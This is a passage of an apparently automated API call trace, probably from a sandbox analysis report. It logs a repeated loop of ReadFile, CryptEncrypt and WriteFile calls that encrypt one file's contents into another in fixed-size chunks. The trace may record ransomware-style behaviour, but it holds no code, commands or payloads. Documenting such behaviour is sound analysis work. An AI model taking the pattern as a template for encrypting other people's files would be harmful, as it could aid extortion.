lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.798] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.798] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.798] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.799] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.799] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.799] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.799] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.799] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.800] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.800] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.800] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.800] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.800] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.801] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.801] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.801] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.801] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.801] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.801] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.802] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.802] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.802] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.804] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.804] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.804] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.804] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.805] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.805] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.805] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.805] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.806] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.806] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.806] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.806] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.806] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.807] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.807] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.807] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.807] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.807] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.807] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.808] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.808] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 